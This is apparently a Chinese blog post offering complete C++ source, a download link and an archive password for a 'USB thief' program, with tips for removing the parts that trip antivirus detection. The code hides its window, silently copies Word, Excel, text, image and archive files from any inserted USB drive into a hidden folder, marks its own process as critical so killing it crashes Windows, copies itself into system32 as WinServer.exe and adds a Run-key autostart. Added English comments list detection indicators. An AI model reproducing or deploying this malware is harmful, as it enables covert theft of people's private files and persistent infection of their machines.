不多说,直接上代码,貌似现在流行代码即文档,就不做说明了
注:
这程序360报毒,云引擎报HEUR/Malware.QVM10.Gen,要解决的话,可以把写注册表给删了,把复制自身到C盘给干掉,就不会报毒了
在http://www.virscan.org/扫描有AVG报毒,其余都不报毒
下载地址:http://www.lanyus.com/wordpress/wp-content/uploads/2013/03/USB.rar
解压密码:www.lanyus.com
/**
版权所有 (C), 2013, 无心问世工作室
程序名: U盘小偷
作者: 无心问世
版本: v1.0
日期: 2013/3/15
描述: 复制U盘里的文档的东西,你懂的
使用此程序可随意修改,发布,但需保留作者版权信息
**/
#include <windows.h>
#include <string>
#include <stdio.h>
#include <Dbt.h>
#include <iostream>
#include "io.h"
#include "tlhelp32.h"
#include "stdio.h"
#include <tchar.h>
#include <conio.h>
#include <fstream>
using namespace std;
// Analyst notes (file scope): globals, native-API function-pointer types and
// forward declarations used by the rest of the program.
// Handle of the named single-instance mutex created in WinMain.
HANDLE hOneInstanceMutex;
// Staging directory that receives the copied files. The path sits under a
// Tencent QQ install tree; the program itself creates it (see Safe()), so its
// existence on a host does not depend on QQ being installed.
char to_dst[10000] = "D:\\Program Files\\Tencent\\QQ\\Bin\\Import\\";
// Signatures for two ntdll exports that WinMain resolves at run time with
// GetProcAddress instead of linking against them.
typedef ULONG(__stdcall*PRtlAdjustPrivilege)(ULONG Privilege,int Enable,int CurrentThread,int*Enabled);
typedef ULONG(__stdcall*PNtSetInformationProcess)(HANDLE ProcessHandle,ULONG InformationClass,void*Information,ULONG Length);
// Returns the volume serial number of a drive root (used to name the per-drive folder).
int Getdisknumber(LPCTSTR lpRootPathName);
// Recursive copy routines: ImDir handles the "doc" suffix, Dir handles the
// spreadsheet/text/image/archive suffixes.
void ImDir(char *lpPath,char *dst_dir,char *dst_list_dir);
void Dir(char *lpPath,char *dst_dir,char *dst_list_dir);
LRESULT CALLBACK WndProc(HWND hwnd,UINT uMsg,WPARAM wParam,LPARAM lParam);
// Writes an HKLM Run value (logon persistence).
int AutoStartSystem(char *keyname,TCHAR lpFilename[MAX_PATH]);
// Creates the staging directory, self-copies into system32 and registers the Run value.
int Safe();
// Entry point. Behaviour visible in this function, in order:
//   1. resolves two undocumented ntdll exports and uses them to enable a
//      privilege and set a process-information flag on itself;
//   2. enforces a single instance through a named mutex;
//   3. creates a hidden top-level window whose only purpose is to receive
//      WM_DEVICECHANGE broadcasts (handled in WndProc);
//   4. pumps messages, calling Safe() after every dispatched message.
// Detection-relevant artifacts: mutex name "USBSPY_is_Running", window class
// "usb", and the ntdll calls below.
// NOTE(review): the string literals passed to CreateWindow/RegisterClass and the
// strcpy calls on TCHAR buffers elsewhere imply an ANSI (non-UNICODE) build.
int APIENTRY WinMain(HINSTANCE hInstance,HINSTANCE hPrevInstance,LPSTR lpCmdLine,int nCmdShow)
{
HMODULE ntdll;
int b;
PRtlAdjustPrivilege pRtlAdjustPrivilege;
PNtSetInformationProcess pNtSetInformationProcess;
ntdll=GetModuleHandleW(L"ntdll.dll");
// Neither GetProcAddress result is checked for NULL before being called.
pRtlAdjustPrivilege=(PRtlAdjustPrivilege)GetProcAddress(ntdll,"RtlAdjustPrivilege");
pNtSetInformationProcess=(PNtSetInformationProcess)GetProcAddress(ntdll,"NtSetInformationProcess");
// Privilege index 20 is SeDebugPrivilege in the public NT headers; Enable=1,
// CurrentThread=0 (process-wide). The constant is not named in this file.
pRtlAdjustPrivilege(20,1,0,&b);
b=1;
// (HANDLE)-1 is the current-process pseudo-handle. Information class 0x1d is
// ProcessBreakOnTermination in the public NT headers: with the value set to 1
// the process is marked critical, so terminating it makes Windows bugcheck.
// This is the reason responders should not simply kill the process while the
// flag is set.
pNtSetInformationProcess((HANDLE)-1,0x1d,&b,sizeof b);
hOneInstanceMutex = NULL;
// Named mutex used as a run-once guard; its name is a stable host indicator.
hOneInstanceMutex = ::CreateMutex(NULL, FALSE, _T("USBSPY_is_Running"));
if(GetLastError() == ERROR_ALREADY_EXISTS)
{
// Another instance already owns the mutex: clear the critical flag and exit.
hOneInstanceMutex = NULL;
b=0;
pNtSetInformationProcess((HANDLE)-1,0x1d,&b,sizeof b);
return 0;
}
WNDCLASS wndclass;
wndclass.cbClsExtra=0;
wndclass.cbWndExtra=0;
wndclass.hbrBackground=(HBRUSH)GetStockObject(BLACK_BRUSH);
wndclass.hCursor=LoadCursor(NULL,IDC_ICON);
wndclass.hIcon=LoadIcon(NULL,IDI_ASTERISK);
wndclass.hInstance=hInstance;
wndclass.lpfnWndProc=WndProc;
wndclass.lpszClassName="usb";
wndclass.lpszMenuName=NULL;
wndclass.style=CS_VREDRAW|CS_HREDRAW;
RegisterClass(&wndclass);
HWND hwnd;
// Window with an empty title that is immediately hidden: there is no visible UI.
hwnd=CreateWindow("usb","",WS_OVERLAPPEDWINDOW,150,150,683,384,NULL,NULL,hInstance,NULL);
ShowWindow(hwnd,SW_HIDE);
UpdateWindow(hwnd);
MSG msg;
// Message loop restricted to this window's messages.
while(GetMessage(&msg,hwnd,0,0))
{
TranslateMessage(&msg);
DispatchMessage(&msg);
// Re-runs the staging-directory / self-copy / Run-key routine after every
// message, so a deleted Run value or staging directory is recreated while
// the process is alive.
Safe();
}
// Clears the critical-process flag before a normal exit.
b=0;
pNtSetInformationProcess((HANDLE)-1,0x1d,&b,sizeof b);
return 0;
}
// Window procedure of the hidden window. The security-relevant branch is
// WM_DEVICECHANGE: when a volume arrives, every removable drive is copied
// into a per-drive folder under to_dst and several hidden cmd.exe children
// are launched to write listings and set attributes.
// Host artifacts produced here (paths relative to to_dst, <serial> is the
// decimal volume serial number returned by Getdisknumber):
//   <serial>\                  mirrored directory tree with the copied files
//   <serial>.txt               output of "dir /S /O:-D /T:W /N" for the drive
//   <serial>\ImFileChange.txt  log appended by ImDir
//   <serial>\FileChange.txt    log appended by Dir
// The <serial> directory is given the read-only, system and hidden attributes.
// Process-tree indicator: this process spawning "cmd /c dir", "cmd /c attrib"
// and "cmd /c echo" with hidden windows right after a removable volume mounts.
LRESULT CALLBACK WndProc( HWND hwnd, UINT uMsg, WPARAM wParam, LPARAM lParam )
{
switch(uMsg)
{
case WM_PAINT:
{
// Validates the paint region; nothing is drawn.
PAINTSTRUCT ps;
BeginPaint(hwnd,&ps);
EndPaint(hwnd,&ps);
break;
}
case WM_CLOSE:
{
// Returns without forwarding to DefWindowProc, so a close request does not
// destroy the window.
return FALSE;
break;
}
case WM_DESTROY:
{
// No PostQuitMessage here: the message loop in WinMain is not asked to end.
return FALSE;
break;
}
case WM_CREATE:
{
// Staging directory, self-copy and Run value are set up as soon as the window exists.
Safe();
break;
}
case WM_DEVICECHANGE:
{
if(lParam!=0)
{
PDEV_BROADCAST_HDR lpdb = (PDEV_BROADCAST_HDR)lParam;
if(lpdb->dbch_devicetype==DBT_DEVTYP_VOLUME)
{
if(wParam==DBT_DEVICEARRIVAL)
{
long i,j;
TCHAR buf[100];
TCHAR *cdbuf;
j=100;
// buf receives the NUL-separated list of drive roots; i is the length written.
i=GetLogicalDriveStrings(j,buf);
// The index advances one character at a time, so cdbuf is tested at every
// offset of the buffer, not only at the start of each drive string.
for(j=0;j<i;j++)
{
cdbuf=&buf[j];
if(GetDriveType(cdbuf)==DRIVE_REMOVABLE)
{
// Destination folder name = decimal volume serial number of the drive.
char disk_number[260];
sprintf(disk_number,"%d",Getdisknumber(cdbuf));
char to_dst_dir[260];
char set_hid_dir[260];
strcpy(to_dst_dir,to_dst);
strcat(to_dst_dir,disk_number);
// set_hid_dir keeps the folder path without the trailing backslash; it is
// used for the attrib call and as the stem of the <serial>.txt listing.
strcpy(set_hid_dir,to_dst_dir);
strcat(to_dst_dir,"\\");
// Marker check: if a file named "XF5201314" can be opened in the drive root,
// the drive is skipped entirely.
char imdstfile[200];
strcpy(imdstfile,cdbuf);
strcat(imdstfile,"XF5201314");
fstream _file;
_file.open(imdstfile,ios::in);
if(_file)
{
continue;
}
CreateDirectory(to_dst_dir,NULL);
// Two recursive passes over the drive: ImDir for the "doc" suffix, Dir for
// the other listed suffixes. Both run synchronously on the window thread.
ImDir(cdbuf,to_dst_dir,to_dst_dir);
Dir(cdbuf,to_dst_dir,to_dst_dir);
// Full recursive directory listing of the drive, newest first, written to
// <to_dst><serial>.txt by a hidden cmd.exe.
char cmdline[260];
strcpy(cmdline,"cmd /c dir \"");
strcat(cmdline,cdbuf);
strcat(cmdline,"\" /S /O:-D /T:W /N > \"");
strcat(cmdline,set_hid_dir);
strcat(cmdline,".txt\"");
WinExec(cmdline,SW_HIDE);
// Marks the per-drive folder read-only + system + hidden so it is not shown
// by default Explorer settings.
char cmdstrend[260];
strcpy(cmdstrend,"cmd /c attrib +R +S +H \"");
strcat(cmdstrend,set_hid_dir);
strcat(cmdstrend,"\"");
WinExec(cmdstrend,SW_HIDE);
// Appends a separator line to each of the two log files, delimiting one
// insertion event from the next.
char cmdstrimdir[260];
strcpy(cmdstrimdir,"cmd /c echo \"--------------------------------\" >> \"");
strcat(cmdstrimdir,to_dst_dir);
strcat(cmdstrimdir,"ImFileChange.txt\"");
WinExec(cmdstrimdir,SW_HIDE);
char cmdstrimdir2[260];
strcpy(cmdstrimdir2,"cmd /c echo \"--------------------------------\" >> \"");
strcat(cmdstrimdir2,to_dst_dir);
strcat(cmdstrimdir2,"FileChange.txt\"");
WinExec(cmdstrimdir2,SW_HIDE);
}
}
}
}
}
break;
}
default:
{
return DefWindowProc(hwnd,uMsg,wParam,lParam);
break;
}
}
return 0;
}
// Persistence: writes a REG_SZ value named `keyname` under
// HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run whose data
// is `lpFilename` wrapped in double quotes, so the file is started at logon.
// Parameters:
//   keyname    - name of the Run value to create or overwrite.
//   lpFilename - path of the executable to register.
// Returns 0 in every case; the results of RegOpenKey and RegSetValueEx are
// stored in `ret` but never inspected.
// Detection: monitor creation or modification of values under this Run key
// (the only caller in this file passes "WinServer").
int AutoStartSystem(char *keyname,TCHAR lpFilename[MAX_PATH])
{
HKEY hkResult;
TCHAR Path[MAX_PATH];
// Build "\"<path>\"" so a path containing spaces is launched as one token.
strcpy(Path,"\"");
strcat(Path,lpFilename);
strcat(Path,"\"");
LPCSTR regname="Software\\Microsoft\\Windows\\CurrentVersion\\Run";
// HKLM is machine-wide; writing here normally requires administrative rights.
int ret=RegOpenKey(HKEY_LOCAL_MACHINE,regname,&hkResult);
ret=RegSetValueEx(hkResult,keyname,0,REG_SZ,(unsigned char *)Path,sizeof(Path));
RegCloseKey(hkResult);
return 0;
}
// Recursively walks `lpPath`, recreates its directory structure under
// `dst_dir`, and copies every file whose path ends in the three characters
// "doc" (case-insensitive) to the mirrored location. Each copied source path
// is appended to "<dst_list_dir>ImFileChange.txt" through a hidden cmd.exe.
// Parameters:
//   lpPath       - directory to enumerate (initially the removable drive root).
//   dst_dir      - destination directory that mirrors lpPath.
//   dst_list_dir - directory prefix of the log file; passed unchanged through
//                  the recursion.
// Entries whose name starts with '.' are skipped, which covers "." and ".."
// as well as any other dot-prefixed file or folder.
// NOTE(review): names read from the removable drive are concatenated into
// fixed-size buffers and into a cmd.exe command line without length checks or
// escaping, so this sample should only be exercised against controlled media.
void ImDir(char *lpPath,char *dst_dir,char *dst_list_dir)
{
char szFind[10000];
strcpy(szFind,lpPath);
strcat(szFind,"\\*.*");
WIN32_FIND_DATA wfd;
HANDLE hFind=FindFirstFile(szFind,&wfd);
if (hFind == INVALID_HANDLE_VALUE)
{
FindClose(hFind);
return;
}
else
{
do
{
if (wfd.cFileName[0] == '.')
continue;
if (wfd.dwFileAttributes & FILE_ATTRIBUTE_DIRECTORY)
{
// Sub-directory: create the same name under dst_dir and recurse into it.
// The directory is created even when nothing inside it ends up being copied.
char szFile[10000];
char dir[10000];
strcpy(szFile,lpPath);
strcpy(dir,dst_dir);
strcat(szFile,"\\");
strcat(dir,"\\");
strcat(szFile,wfd.cFileName);
strcat(dir,wfd.cFileName);
CreateDirectory(dir,NULL);
ImDir(szFile,dir,dst_list_dir);
}
else
{
char szFile[10000];
strcpy(szFile,lpPath);
strcat(szFile,"\\");
strcat(szFile,wfd.cFileName);
int len=strlen(szFile);
// p addresses the final three characters of the full path; strlwr lowercases
// them in place inside szFile, and the comparison below is made on that
// three-character suffix.
char *p=&szFile[len-3];
strlwr(p);
if(strcmp(p,"doc")==0||strcmp(p,"docx")==0)
{
char dst_file[10000];
strcpy(dst_file,dst_dir);
strcat(dst_file,"\\");
strcat(dst_file,wfd.cFileName);
// Existence probe: the stream opens only if a copy is already present.
fstream _file;
_file.open(dst_file,ios::in);
if(!_file)
{
// First sighting of this file: copy it (fail-if-exists = true) and log the
// source path.
CopyFile(szFile,dst_file,true);
char cmdstrimdir1[260];
strcpy(cmdstrimdir1,"cmd /c echo \"");
strcat(cmdstrimdir1,szFile);
strcat(cmdstrimdir1,"\" >> \"");
strcat(cmdstrimdir1,dst_list_dir);
strcat(cmdstrimdir1,"ImFileChange.txt\"");
WinExec(cmdstrimdir1,SW_HIDE);
}
else
{
// A copy exists: compare last-write times and overwrite the stored copy
// whenever they differ, logging the source path again.
WIN32_FIND_DATA dst;
HANDLE find_dst = FindFirstFile(dst_file,&dst);
LONG lRet = CompareFileTime(&wfd.ftLastWriteTime,&dst.ftLastWriteTime);
if (lRet != 0)
{
CopyFile(szFile,dst_file,false);
char cmdstrimdir2[260];
strcpy(cmdstrimdir2,"cmd /c echo \"");
strcat(cmdstrimdir2,szFile);
strcat(cmdstrimdir2,"\" >> \"");
strcat(cmdstrimdir2,dst_list_dir);
strcat(cmdstrimdir2,"ImFileChange.txt\"");
WinExec(cmdstrimdir2,SW_HIDE);
}
FindClose(find_dst);
}
}
}
}
while(FindNextFile(hFind, &wfd));
FindClose(hFind);
}
}
// Same traversal as ImDir, applied to a different set of suffixes: files whose
// path ends in the three characters "xls", "txt", "jpg", "png", "bmp", "rar"
// or "zip" (case-insensitive) are copied into the mirrored tree under
// `dst_dir`, and each copied source path is appended to
// "<dst_list_dir>FileChange.txt" through a hidden cmd.exe.
// Parameters:
//   lpPath       - directory to enumerate (initially the removable drive root).
//   dst_dir      - destination directory that mirrors lpPath.
//   dst_list_dir - directory prefix of the log file; passed unchanged through
//                  the recursion.
// Entries whose name starts with '.' are skipped.
// NOTE(review): as in ImDir, names read from the removable drive reach
// fixed-size buffers and a cmd.exe command line without length checks or
// escaping; analyse only against controlled media.
void Dir(char *lpPath,char *dst_dir,char *dst_list_dir)
{
char szFind[10000];
strcpy(szFind,lpPath);
strcat(szFind,"\\*.*");
WIN32_FIND_DATA wfd;
HANDLE hFind=FindFirstFile(szFind,&wfd);
if (hFind == INVALID_HANDLE_VALUE)
{
FindClose(hFind);
return;
}
else
{
do
{
if (wfd.cFileName[0] == '.')
continue;
if (wfd.dwFileAttributes & FILE_ATTRIBUTE_DIRECTORY)
{
// Sub-directory: mirror it under dst_dir and recurse.
char szFile[10000];
char dir[10000];
strcpy(szFile,lpPath);
strcpy(dir,dst_dir);
strcat(szFile,"\\");
strcat(dir,"\\");
strcat(szFile,wfd.cFileName);
strcat(dir,wfd.cFileName);
CreateDirectory(dir,NULL);
Dir(szFile,dir,dst_list_dir);
}
else
{
char szFile[10000];
strcpy(szFile,lpPath);
strcat(szFile,"\\");
strcat(szFile,wfd.cFileName);
int len=strlen(szFile);
// p addresses the final three characters of the full path, lowercased in
// place; the suffix test below is made on those three characters.
char *p=&szFile[len-3];
strlwr(p);
if(strcmp(p,"xls")==0||strcmp(p,"xlsx")==0||strcmp(p,"txt")==0||strcmp(p,"jpg")==0||strcmp(p,"png")==0||strcmp(p,"bmp")==0||strcmp(p,"rar")==0||strcmp(p,"zip")==0)
{
char dst_file[10000];
strcpy(dst_file,dst_dir);
strcat(dst_file,"\\");
strcat(dst_file,wfd.cFileName);
// Existence probe for a previously stored copy.
fstream _file;
_file.open(dst_file,ios::in);
if(!_file)
{
// Not stored yet: copy and log the source path.
CopyFile(szFile,dst_file,true);
char cmdstrimdir1[260];
strcpy(cmdstrimdir1,"cmd /c echo \"");
strcat(cmdstrimdir1,szFile);
strcat(cmdstrimdir1,"\" >> \"");
strcat(cmdstrimdir1,dst_list_dir);
strcat(cmdstrimdir1,"FileChange.txt\"");
WinExec(cmdstrimdir1,SW_HIDE);
}
else
{
// Already stored: overwrite when the last-write times differ, and log again.
WIN32_FIND_DATA dst;
HANDLE find_dst = FindFirstFile(dst_file,&dst);
LONG lRet = CompareFileTime(&wfd.ftLastWriteTime,&dst.ftLastWriteTime);
if (lRet != 0)
{
CopyFile(szFile,dst_file,false);
char cmdstrimdir2[260];
strcpy(cmdstrimdir2,"cmd /c echo \"");
strcat(cmdstrimdir2,szFile);
strcat(cmdstrimdir2,"\" >> \"");
strcat(cmdstrimdir2,dst_list_dir);
strcat(cmdstrimdir2,"FileChange.txt\"");
WinExec(cmdstrimdir2,SW_HIDE);
}
FindClose(find_dst);
}
}
}
}
while(FindNextFile(hFind, &wfd));
FindClose(hFind);
}
}
// Returns the volume serial number of the drive whose root is
// `lpRootPathName`, converted to int. WndProc formats this value with "%d"
// and uses it as the name of the per-drive staging folder, so the folder name
// ties a set of copied files to one specific volume.
// The result of GetVolumeInformation is not checked; if the call fails,
// VolumeSerialNumber is returned without having been assigned.
// The two buffers allocated with new[] are not released in this function.
int Getdisknumber(LPCTSTR lpRootPathName)
{
LPTSTR lpVolumeNameBuffer=new char[12];
DWORD nVolumeNameSize=12;
DWORD VolumeSerialNumber;
DWORD MaximumComponentLength;
LPTSTR lpFileSystemNameBuffer=new char[10];
DWORD nFileSystemNameSize=10;
DWORD FileSystemFlags;
::GetVolumeInformation(lpRootPathName,lpVolumeNameBuffer,nVolumeNameSize,&VolumeSerialNumber,&MaximumComponentLength, &FileSystemFlags,lpFileSystemNameBuffer,nFileSystemNameSize);
return VolumeSerialNumber;
}
// Install / self-repair routine, called on WM_CREATE and after every message
// dispatched by the loop in WinMain. It performs three actions:
//   1. creates the staging directory named in to_dst via a hidden
//      "cmd /c mkdir";
//   2. copies the running executable to C:\WINDOWS\system32\WinServer.exe
//      (fail-if-exists is TRUE, so an existing file is left as it is);
//   3. registers that path as the HKLM Run value "WinServer" through
//      AutoStartSystem.
// Always returns 1; no result of the steps above is checked.
// Host indicators for triage: the file C:\WINDOWS\system32\WinServer.exe, the
// Run value "WinServer", and repeated hidden "cmd /c mkdir" children of this
// process.
int Safe()
{
char cmdmkdir[260];
strcpy(cmdmkdir,"cmd /c mkdir \"");
strcat(cmdmkdir,to_dst);
strcat(cmdmkdir,"\"");
WinExec(cmdmkdir,SW_HIDE);
// Path of the currently running image.
TCHAR ExeFullPath[MAX_PATH];
GetModuleFileName(NULL,ExeFullPath,MAX_PATH);
// Fixed drop location with a name resembling a system component.
TCHAR NewFilePath[MAX_PATH]="C:\\WINDOWS\\system32\\WinServer.exe";
CopyFile(ExeFullPath,NewFilePath,TRUE);
AutoStartSystem("WinServer",NewFilePath);
return 1;
}
